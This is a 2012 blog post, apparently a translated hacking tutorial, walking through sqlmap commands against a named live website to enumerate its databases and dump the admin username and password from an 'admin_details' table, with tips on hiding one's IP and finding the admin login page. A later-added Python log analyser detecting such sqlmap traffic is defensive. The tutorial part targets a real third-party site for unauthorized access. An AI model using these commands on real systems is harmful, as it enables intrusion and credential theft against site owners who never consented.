Wednesday, March 28, 2012

SqlMaps Tutorial



What you need:

--> Download Python 2.7 - http://www.python.org/ftp/python/2.7.2/python-2.7.2.msi

--> Download Sqlmap - http://cdnetworks-kr-1.dl.sourceforge.net/project/sqlmap/sqlmap/0.9/sqlmap-0.9.zip

--> CMD (the same thing as Command Prompt)

--> A vulnerable website <TARGET> ( http://grinbo.at/events_detail.php?id=62' )

--> Tools for hiding your IP address can be found here
http://nospain-dot-com.blogspot.com/2012/03/tool-for-hiding-ip-address.html




NOTE: IF THE " > " SYMBOL OR A " Y/N " OPTION APPEARS, JUST PRESS ENTER



1. Install Python 2.7

2. Save the sqlmap files to Local Disk (C:)

3. Open CMD

4. Type C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 --dbs and press Enter

5. Type C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 -D usr_web14_1 --tables and press Enter

6. Type C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 -D usr_web14_1 -T admin_details --columns and press Enter

7. Type C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 -D usr_web14_1 -T admin_details -C admin_name -U test --dump and press Enter

8. Type C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 -D usr_web14_1 -T admin_details -C admin_password -U test --dump and press Enter


DONE!!
The ID for logging in to the website is in step 7
The password for logging in to the website is in step 8
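
From the defender's side, the requests made in steps 4 to 8 stand out in a web server access log. The following is an added example, not part of the original post: it assumes the combined log format, a numeric id parameter as in the URL above, and sqlmap's default User-Agent; the log lines and the names classify and flag_clients are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access log format (assumed).
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
SQL_WORDS = re.compile(r"(?i)\b(union|select|information_schema)\b")

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Mar/2012:10:00:01 +0000] "GET /events_detail.php?id=62 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [28/Mar/2012:10:02:11 +0000] "GET /events_detail.php?id=62%27 HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [28/Mar/2012:10:03:40 +0000] "GET /events_detail.php?id=62%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '198.51.100.9 - - [28/Mar/2012:10:03:41 +0000] "GET /events_detail.php?id=62%20UNION%20ALL%20SELECT%20NULL HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
]

def classify(line, param="id"):
    """Return (client_ip, reasons) for one log line; reasons is empty if clean."""
    m = LINE.match(line)
    if m is None:
        return None, []          # not a combined-format line: skip it
    reasons = []
    # sqlmap announces itself unless its User-Agent has been overridden.
    if m["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    # parse_qs percent-decodes values, so encoded quotes and spaces are seen.
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for value in query.get(param, []):
        # The parameter is a numeric record id; anything else is anomalous.
        if not re.fullmatch(r"[0-9]+", value):
            reasons.append("non-integer-" + param)
        if SQL_WORDS.search(value):
            reasons.append("sql-keyword")
    return m["ip"], reasons

def flag_clients(lines, min_hits=2):
    """Aggregate reasons per client; flag a sqlmap UA or repeated anomalies."""
    per_ip = defaultdict(Counter)
    for line in lines:
        ip, reasons = classify(line)
        if ip is not None:
            per_ip[ip].update(reasons)
    return {ip: dict(c) for ip, c in per_ip.items()
            if c["sqlmap-user-agent"] or sum(c.values()) >= min_hits}

if __name__ == "__main__":
    for ip, reasons in flag_clients(SAMPLE_LOG).items():
        print(ip, reasons)
```

The User-Agent check only catches a default configuration; the non-integer check on a numeric parameter still fires when the User-Agent is changed.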


Now we look for the admin login page
Find the admin login using this website
http://tools.th3-0utl4ws.com/admin-finder/


For a sqlmap tutorial on BackTrack, see here
http://www.youtube.com/watch?feature=player_embedded&v=edLuLiOyTQU


CREDITS: Seth Erry DotMy
http://h4ckingtutors.blogspot.com/2012/03/cara-mengunakan-sqlmaps.html
